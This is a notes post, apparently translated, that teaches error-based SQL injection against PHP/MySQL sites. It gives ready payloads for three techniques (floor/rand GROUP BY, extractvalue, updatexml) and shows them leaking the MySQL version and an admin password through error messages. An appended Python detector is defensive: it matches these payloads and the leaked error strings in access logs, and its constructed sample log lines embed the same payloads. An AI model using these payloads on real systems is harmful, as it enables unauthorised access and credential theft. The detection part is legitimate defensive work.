Posting some of my old notes. MySQL throws an error message when a statement fails, and PHP+MySQL sites often print that error text straight onto the page, so the following three methods can be used to pull specific data out of the error.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is leaked in the error message. To extract other data, replace version() with the subquery you want.
For example, to retrieve the admin username and password:
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
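As an added defensive example (not part of the original notes), the following Python flags the three error-based patterns above in URL-decoded request logs and recognises the leaked MySQL error strings that show a site is echoing database errors to users; the access-log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the three techniques described above
# (floor/rand GROUP BY, extractvalue, updatexml), applied after normalisation.
SIGNATURES = {
    "floor-group-by": re.compile(r"floor\(rand\(\d*\)\*2\).*group by|group by.*floor\(rand\(\d*\)\*2\)"),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "updatexml": re.compile(r"updatexml\s*\("),
}

# Error strings MySQL returns for these payloads; seeing them in a page body or
# application log means database errors are being echoed to the client.
LEAK_PATTERNS = {
    "duplicate-entry-group_key": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath-syntax-error": re.compile(r"XPATH syntax error: '.*'"),
}

def normalise(raw):
    """URL-decode twice (double-encoded input), lowercase, drop /* */ comments, collapse whitespace."""
    s = unquote_plus(unquote_plus(raw)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s)

def classify_request(query_string):
    """Return the names of the error-based techniques found in one query string."""
    s = normalise(query_string)
    return [name for name, pat in SIGNATURES.items() if pat.search(s)]

def classify_error(line):
    """Return the names of the leaked-error patterns found in one log/output line."""
    return [name for name, pat in LEAK_PATTERNS.items() if pat.search(line)]

def scan_access_log(lines):
    """Return (line_no, techniques) for every access-log line whose query string matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m:
            found = classify_request(m.group(1).partition("?")[2])
            if found:
                hits.append((n, found))
    return hits

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 233',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 190',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 190',
]
```

The request-side matches are the signal to alert on; the error-side matches tell you the application must stop displaying raw MySQL errors and use parameterised queries, since the leak only works when the error text reaches the page.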
All, thanks foreign guys.